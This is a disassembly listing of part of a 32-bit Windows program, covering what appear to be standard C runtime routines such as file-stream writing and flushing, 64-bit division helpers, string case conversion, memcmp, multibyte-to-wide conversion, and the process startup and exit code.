loc_41DBC6: ; CODE XREF: sub_41DB54+47�j
; sub_41DB54+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_41DC11
test ecx, ecx
jz short loc_41DBDA
push esi
call sub_41E42B
test eax, eax
pop ecx
jnz short loc_41DC53
loc_41DBDA: ; CODE XREF: sub_41DB54+79�j
cmp [ebp+arg_C], 0
jz short loc_41DBED
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_41DBEF
; ---------------------------------------------------------------------------
loc_41DBED: ; CODE XREF: sub_41DB54+8A�j
mov edi, ebx
loc_41DBEF: ; CODE XREF: sub_41DB54+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_4230FB
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_41DC4A
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_41DC4A
loc_41DC0C: ; CODE XREF: sub_41DB54+70�j
mov edi, [ebp+var_4]
jmp short loc_41DC3A
; ---------------------------------------------------------------------------
loc_41DC11: ; CODE XREF: sub_41DB54+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_41FE2A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41DC53
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_41DC3A
mov [ebp+arg_C], 1
loc_41DC3A: ; CODE XREF: sub_41DB54+BB�j
; sub_41DB54+DD�j
test ebx, ebx
jnz loc_41DB92
mov eax, [ebp+arg_8]
loc_41DC45: ; CODE XREF: sub_41DB54+1F�j
; sub_41DB54+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41DC4A: ; CODE XREF: sub_41DB54+AD�j
; sub_41DB54+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_41DC55
; ---------------------------------------------------------------------------
loc_41DC53: ; CODE XREF: sub_41DB54+84�j
; sub_41DB54+CF�j
mov eax, edi
loc_41DC55: ; CODE XREF: sub_41DB54+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_41DC45
sub_41DB54 endp
; =============== S U B R O U T I N E =======================================
sub_41DC5E proc near ; CODE XREF: sub_416CAF+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_4270A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_41DC7E
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
call sub_420C7F
pop ecx
loc_41DC7A: ; CODE XREF: sub_41DC5E+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41DC7E: ; CODE XREF: sub_41DC5E+D�j
test al, 1
jz short loc_41DC9F
test [esp+arg_4], 2
jz short loc_41DC9F
mov dword_4DBDDC, 0Dh
mov dword_4DBDE0, 5
jmp short loc_41DC7A
; ---------------------------------------------------------------------------
loc_41DC9F: ; CODE XREF: sub_41DC5E+22�j
; sub_41DC5E+29�j
xor eax, eax
retn
sub_41DC5E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41DCB0 proc near ; CODE XREF: sub_416CC9+3F�p
; sub_41AED9+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_41DCD2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_41DD13
; ---------------------------------------------------------------------------
loc_41DCD2: ; CODE XREF: sub_41DCB0+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_41DCE0: ; CODE XREF: sub_41DCB0+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41DCE0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_41DD0E
cmp edx, [esp+8+arg_4]
ja short loc_41DD0E
jb short loc_41DD0F
cmp eax, [esp+8+arg_0]
jbe short loc_41DD0F
loc_41DD0E: ; CODE XREF: sub_41DCB0+4E�j
; sub_41DCB0+54�j
dec esi
loc_41DD0F: ; CODE XREF: sub_41DCB0+56�j
; sub_41DCB0+5C�j
xor edx, edx
mov eax, esi
loc_41DD13: ; CODE XREF: sub_41DCB0+20�j
pop esi
pop ebx
retn 10h
sub_41DCB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41DD20 proc near ; CODE XREF: sub_416CC9+2D�p
; sub_41AED9+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_41DD41
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_41DD91
; ---------------------------------------------------------------------------
loc_41DD41: ; CODE XREF: sub_41DD20+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41DD4F: ; CODE XREF: sub_41DD20+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41DD4F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41DD7A
cmp edx, [esp+4+arg_4]
ja short loc_41DD7A
jb short loc_41DD82
cmp eax, [esp+4+arg_0]
jbe short loc_41DD82
loc_41DD7A: ; CODE XREF: sub_41DD20+4A�j
; sub_41DD20+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_41DD82: ; CODE XREF: sub_41DD20+52�j
; sub_41DD20+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_41DD91: ; CODE XREF: sub_41DD20+1F�j
pop ebx
retn 10h
sub_41DD20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41DDA0 proc near ; CODE XREF: sub_416DD9+5F�p
; sub_416DD9+92�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_41DDC1
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_41DDC1: ; CODE XREF: sub_41DDA0+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41DDDD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41DDDD: ; CODE XREF: sub_41DDA0+27�j
or eax, eax
jnz short loc_41DDF9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41DE3A
; ---------------------------------------------------------------------------
loc_41DDF9: ; CODE XREF: sub_41DDA0+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41DE07: ; CODE XREF: sub_41DDA0+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41DE07
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_41DE35
cmp edx, [esp+0Ch+arg_4]
ja short loc_41DE35
jb short loc_41DE36
cmp eax, [esp+0Ch+arg_0]
jbe short loc_41DE36
loc_41DE35: ; CODE XREF: sub_41DDA0+85�j
; sub_41DDA0+8B�j
dec esi
loc_41DE36: ; CODE XREF: sub_41DDA0+8D�j
; sub_41DDA0+93�j
xor edx, edx
mov eax, esi
loc_41DE3A: ; CODE XREF: sub_41DDA0+57�j
dec edi
jnz short loc_41DE44
neg edx
neg eax
sbb edx, 0
loc_41DE44: ; CODE XREF: sub_41DDA0+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_41DDA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DE4A proc near ; CODE XREF: sub_417493+BF�p
; sub_417493+12C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword_4DBE84
push ebx
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_4], ebx
jnz short loc_41DE7E
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz short loc_41DEE5
loc_41DE66: ; CODE XREF: sub_41DE4A+30�j
mov cl, [edx]
cmp cl, 61h
jl short loc_41DE77
cmp cl, 7Ah
jg short loc_41DE77
sub cl, 20h
mov [edx], cl
loc_41DE77: ; CODE XREF: sub_41DE4A+21�j
; sub_41DE4A+26�j
inc edx
cmp [edx], bl
jnz short loc_41DE66
jmp short loc_41DEE5
; ---------------------------------------------------------------------------
loc_41DE7E: ; CODE XREF: sub_41DE4A+11�j
push esi
push edi
push 1
push ebx
push ebx
push ebx
push 0FFFFFFFFh
mov esi, 200h
push [ebp+arg_0]
push esi
push eax
call sub_4232A8
mov edi, eax
add esp, 20h
cmp edi, ebx
jz short loc_41DED7
push edi
call sub_41BEB5
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_41DED7
push 1
push ebx
push edi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push dword_4DBE84
call sub_4232A8
add esp, 20h
test eax, eax
jz short loc_41DED7
push [ebp+var_4]
push [ebp+arg_0]
call sub_41C890
pop ecx
pop ecx
loc_41DED7: ; CODE XREF: sub_41DE4A+53�j
; sub_41DE4A+61�j ...
push [ebp+var_4]
call sub_41BA91
mov eax, [ebp+arg_0]
pop ecx
pop edi
pop esi
loc_41DEE5: ; CODE XREF: sub_41DE4A+1A�j
; sub_41DE4A+32�j
pop ebx
leave
retn
sub_41DE4A endp
; =============== S U B R O U T I N E =======================================
sub_41DEE8 proc near ; CODE XREF: sub_417E84+1A8�p
arg_0 = dword ptr 4
cmp dword_43D084, 1
jle short loc_41DEFF
push 4
push [esp+4+arg_0]
call sub_41FDB5
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41DEFF: ; CODE XREF: sub_41DEE8+7�j
mov eax, [esp+arg_0]
mov ecx, off_43CE78
mov al, [ecx+eax*2]
and eax, 4
retn
sub_41DEE8 endp
; =============== S U B R O U T I N E =======================================
sub_41DF10 proc near ; CODE XREF: sub_420DB0+76�p
; sub_420DB0+88�p ...
arg_0 = dword ptr 4
cmp dword_43D084, 1
jle short loc_41DF27
push 8
push [esp+4+arg_0]
call sub_41FDB5
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41DF27: ; CODE XREF: sub_41DF10+7�j
mov eax, [esp+arg_0]
mov ecx, off_43CE78
mov al, [ecx+eax*2]
and eax, 8
retn
sub_41DF10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41DF40 proc near ; CODE XREF: sub_418295+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_41DF8C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_41DF8D
test eax, 1
jz short loc_41DF6D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41DFBA
inc esi
inc edi
dec eax
jz short loc_41DF8A
loc_41DF6D: ; CODE XREF: sub_41DF40+20�j
; sub_41DF40+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41DFBA
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41DFBA
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41DF6D
loc_41DF8A: ; CODE XREF: sub_41DF40+2B�j
; sub_41DF40+84�j
pop edi
pop esi
locret_41DF8C: ; CODE XREF: sub_41DF40+6�j
retn
; ---------------------------------------------------------------------------
loc_41DF8D: ; CODE XREF: sub_41DF40+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41DFC2
repe cmpsd
jz short loc_41DFC2
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41DFB5
cmp ch, dh
jnz short loc_41DFB5
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41DFB5
cmp ch, dh
loc_41DFB5: ; CODE XREF: sub_41DF40+63�j
; sub_41DF40+67�j ...
mov eax, 0
loc_41DFBA: ; CODE XREF: sub_41DF40+26�j
; sub_41DF40+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41DFC2: ; CODE XREF: sub_41DF40+55�j
; sub_41DF40+59�j
test eax, eax
jz short loc_41DF8A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41DFB5
dec eax
jz short loc_41DFE9
cmp dh, ch
jnz short loc_41DFB5
dec eax
jz short loc_41DFE9
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41DFB5
dec eax
loc_41DFE9: ; CODE XREF: sub_41DF40+8F�j
; sub_41DF40+96�j
pop edi
pop esi
retn
sub_41DF40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DFEC proc near ; CODE XREF: sub_4185B5+6�p
; sub_4185D3+4A�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_4DBE84, 0
push ebx
push esi
push edi
jnz short loc_41E019
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_41E0B2
cmp eax, 5Ah
jg loc_41E0B2
add eax, 20h
jmp loc_41E0B2
; ---------------------------------------------------------------------------
loc_41E019: ; CODE XREF: sub_41DFEC+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_41E04D
cmp dword_43D084, esi
jle short loc_41E03B
push esi
push ebx
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_41E045
; ---------------------------------------------------------------------------
loc_41E03B: ; CODE XREF: sub_41DFEC+42�j
mov eax, off_43CE78
mov al, [eax+ebx*2]
and eax, esi
loc_41E045: ; CODE XREF: sub_41DFEC+4D�j
test eax, eax
jnz short loc_41E04D
loc_41E049: ; CODE XREF: sub_41DFEC+AD�j
mov eax, ebx
jmp short loc_41E0B2
; ---------------------------------------------------------------------------
loc_41E04D: ; CODE XREF: sub_41DFEC+3A�j
; sub_41DFEC+5B�j
mov edx, off_43CE78
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41E071
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_41E07A
; ---------------------------------------------------------------------------
loc_41E071: ; CODE XREF: sub_41DFEC+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_41E07A: ; CODE XREF: sub_41DFEC+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push dword_4DBE84
call sub_4232A8
add esp, 20h
test eax, eax
jz short loc_41E049
cmp eax, esi
jnz short loc_41E0A5
movzx eax, [ebp+var_4]
jmp short loc_41E0B2
; ---------------------------------------------------------------------------
loc_41E0A5: ; CODE XREF: sub_41DFEC+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_41E0B2: ; CODE XREF: sub_41DFEC+16�j
; sub_41DFEC+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41DFEC endp
; =============== S U B R O U T I N E =======================================
sub_41E0B7 proc near ; CODE XREF: sub_418AF1+AD�p
; sub_419AE0+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_41E0CE
loc_41E0C4: ; CODE XREF: sub_41E0B7+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_41E0C4
loc_41E0CE: ; CODE XREF: sub_41E0B7+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_41E0B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E0D4 proc near ; CODE XREF: sub_418AF1+7F�p
; sub_418AF1+90�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_41E1A1
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_41E1CE
cmp dword_4DBE84, esi
jnz short loc_41E125
cmp edi, esi
jbe loc_41E1CE
loc_41E104: ; CODE XREF: sub_41E0D4+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_41E1CE
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_41E104
jmp loc_41E1CE
; ---------------------------------------------------------------------------
loc_41E125: ; CODE XREF: sub_41E0D4+26�j
mov ebx, [ebp+arg_4]
mov esi, ds:dword_4270E8
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword_4DBE94
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_41E1CD
call ds:dword_427094 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_41E15F
loc_41E150: ; CODE XREF: sub_41E0D4+CB�j
; sub_41E0D4+F7�j
mov dword_4DBDDC, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_41E1CE
; ---------------------------------------------------------------------------
loc_41E15F: ; CODE XREF: sub_41E0D4+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_41E167: ; CODE XREF: sub_41E0D4+B3�j
mov cl, [eax]
test cl, cl
jz short loc_41E189
mov edx, off_43CE78
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41E17E
inc eax
loc_41E17E: ; CODE XREF: sub_41E0D4+A7�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_41E167
loc_41E189: ; CODE XREF: sub_41E0D4+97�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push dword_4DBE94
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_41E1CE
jmp short loc_41E150
; ---------------------------------------------------------------------------
loc_41E1A1: ; CODE XREF: sub_41E0D4+F�j
cmp dword_4DBE84, esi
jnz short loc_41E1B4
push [ebp+arg_4]
call sub_41B9C0
pop ecx
jmp short loc_41E1CE
; ---------------------------------------------------------------------------
loc_41E1B4: ; CODE XREF: sub_41E0D4+D3�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push dword_4DBE94
call ds:dword_4270E8 ; MultiByteToWideChar
cmp eax, esi
jz short loc_41E150
loc_41E1CD: ; CODE XREF: sub_41E0D4+6B�j
dec eax
loc_41E1CE: ; CODE XREF: sub_41E0D4+1A�j
; sub_41E0D4+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41E0D4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427700
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call ds:dword_4271B0 ; GetVersion
xor edx, edx
mov dl, ah
mov dword_4DBDF4, edx
mov ecx, eax
and ecx, 0FFh
mov dword_4DBDF0, ecx
shl ecx, 8
add ecx, edx
mov dword_4DBDEC, ecx
shr eax, 10h
mov dword_4DBDE8, eax
xor esi, esi
push esi
call sub_41E672
pop ecx
test eax, eax
jnz short loc_41E23F
push 1Ch
call sub_41E2EE
pop ecx
loc_41E23F: ; CODE XREF: .text:0041E235�j
mov [ebp-4], esi
call sub_423B0B
call ds:dword_4271AC ; GetCommandLineA
mov dword_4DD38C, eax
call sub_4239D9
mov dword_4DBE34, eax
call sub_42378C
call sub_4236D3
call sub_41C164
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call ds:dword_4271A8 ; GetStartupInfoA
call sub_42367B
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_41E28C
movzx eax, word ptr [ebp-2Ch]
jmp short loc_41E28F
; ---------------------------------------------------------------------------
loc_41E28C: ; CODE XREF: .text:0041E284�j
push 0Ah
pop eax
loc_41E28F: ; CODE XREF: .text:0041E28A�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call ds:dword_4270A4 ; GetModuleHandleA
push eax
call sub_401221
mov [ebp-60h], eax
push eax
call sub_41C191
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_4234F7
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_41C1A2
; =============== S U B R O U T I N E =======================================
sub_41E2C9 proc near ; CODE XREF: sub_41DA32+16�p
; sub_4236D3+4E�p ...
arg_0 = dword ptr 4
cmp dword_4DBE3C, 1
jnz short loc_41E2D7
call sub_423D98
loc_41E2D7: ; CODE XREF: sub_41E2C9+7�j
push [esp+arg_0]
call sub_423DD1
push 0FFh
call off_43AE40
pop ecx
pop ecx
retn
sub_41E2C9 endp
; =============== S U B R O U T I N E =======================================
sub_41E2EE proc near ; CODE XREF: .text:0041E239�p
arg_0 = dword ptr 4
cmp dword_4DBE3C, 1
jnz short loc_41E2FC
call sub_423D98
loc_41E2FC: ; CODE XREF: sub_41E2EE+7�j
push [esp+arg_0]
call sub_423DD1
pop ecx
push 0FFh
call ds:dword_42706C ; ExitProcess
retn
sub_41E2EE endp
; =============== S U B R O U T I N E =======================================
sub_41E312 proc near ; CODE XREF: sub_41BA3B+2A�p
; sub_42423B+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, dword_4DD140
jnb loc_41E3AC
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4DD040h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_41E3AC
push edi
call sub_4240AA
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41E38B
cmp edi, 1
jz short loc_41E359
cmp edi, 2
jnz short loc_41E36F
loc_41E359: ; CODE XREF: sub_41E312+40�j
push 2
call sub_4240AA
push 1
mov ebp, eax
call sub_4240AA
pop ecx
cmp eax, ebp
pop ecx
jz short loc_41E38B
loc_41E36F: ; CODE XREF: sub_41E312+45�j
push edi
call sub_4240AA
pop ecx
push eax
call ds:dword_427070 ; CloseHandle
test eax, eax
jnz short loc_41E38B
call ds:dword_427094 ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_41E38D
; ---------------------------------------------------------------------------
loc_41E38B: ; CODE XREF: sub_41E312+3B�j
; sub_41E312+5B�j ...
xor ebp, ebp
loc_41E38D: ; CODE XREF: sub_41E312+77�j
push edi
call sub_424030
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_41E3A8
push ebp
call sub_420C7F
pop ecx
jmp short loc_41E3BD
; ---------------------------------------------------------------------------
loc_41E3A8: ; CODE XREF: sub_41E312+8B�j
xor eax, eax
jmp short loc_41E3C0
; ---------------------------------------------------------------------------
loc_41E3AC: ; CODE XREF: sub_41E312+E�j
; sub_41E312+2F�j
and dword_4DBDE0, 0
mov dword_4DBDDC, 9
loc_41E3BD: ; CODE XREF: sub_41E312+94�j
or eax, 0FFFFFFFFh
loc_41E3C0: ; CODE XREF: sub_41E312+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41E312 endp
; =============== S U B R O U T I N E =======================================
sub_41E3C5 proc near ; CODE XREF: sub_41BA3B+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41E3EE
test al, 8
jz short loc_41E3EE
push dword ptr [esi+8]
call sub_41BA91
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41E3EE: ; CODE XREF: sub_41E3C5+A�j
; sub_41E3C5+E�j
pop esi
retn
sub_41E3C5 endp
; =============== S U B R O U T I N E =======================================
sub_41E3F0 proc near ; CODE XREF: sub_41E490+2D�p
; sub_41E490+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_41E402
push esi
call sub_41E490
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E402: ; CODE XREF: sub_41E3F0+7�j
push esi
call sub_41E42B
test eax, eax
pop ecx
jz short loc_41E412
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E412: ; CODE XREF: sub_41E3F0+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_41E427
push dword ptr [esi+10h]
call sub_4240E7
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_41E427: ; CODE XREF: sub_41E3F0+26�j
xor eax, eax
pop esi
retn
sub_41E3F0 endp
; =============== S U B R O U T I N E =======================================
sub_41E42B proc near ; CODE XREF: sub_41BA3B+1A�p
; sub_41DA8B+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_41E478
test ax, 108h
jz short loc_41E478
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41E478
push edi
push eax
push dword ptr [esi+10h]
call sub_4230FB
add esp, 0Ch
cmp eax, edi
jnz short loc_41E471
mov eax, [esi+0Ch]
test al, 80h
jz short loc_41E478
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_41E478
; ---------------------------------------------------------------------------
loc_41E471: ; CODE XREF: sub_41E42B+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41E478: ; CODE XREF: sub_41E42B+14�j
; sub_41E42B+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41E42B endp
; =============== S U B R O U T I N E =======================================
sub_41E487 proc near ; CODE XREF: sub_4241E3�p
push 1
call sub_41E490
pop ecx
retn
sub_41E487 endp
; =============== S U B R O U T I N E =======================================
sub_41E490 proc near ; CODE XREF: sub_41E3F0+A�p
; sub_41E487+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp dword_4DD020, esi
jle short loc_41E4EE
loc_41E4A1: ; CODE XREF: sub_41E490+5C�j
mov eax, dword_4DC01C
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41E4E5
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41E4E5
cmp [esp+0Ch+arg_0], 1
jnz short loc_41E4CB
push eax
call sub_41E3F0
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41E4E5
inc ebx
jmp short loc_41E4E5
; ---------------------------------------------------------------------------
loc_41E4CB: ; CODE XREF: sub_41E490+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_41E4E5
test cl, 2
jz short loc_41E4E5
push eax
call sub_41E3F0
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41E4E5
or edi, eax
loc_41E4E5: ; CODE XREF: sub_41E490+1B�j
; sub_41E490+23�j ...
inc esi
cmp esi, dword_4DD020
jl short loc_41E4A1
loc_41E4EE: ; CODE XREF: sub_41E490+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_41E4F9
mov eax, edi
loc_41E4F9: ; CODE XREF: sub_41E490+65�j
pop edi
pop esi
pop ebx
retn
sub_41E490 endp
; =============== S U B R O U T I N E =======================================
sub_41E4FD proc near ; CODE XREF: sub_41E52A+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call ds:dword_4270A4 ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_41E528
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_41E528
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_41E528: ; CODE XREF: sub_41E4FD+15�j
; sub_41E4FD+1C�j
pop esi
retn
sub_41E4FD endp
; =============== S U B R O U T I N E =======================================
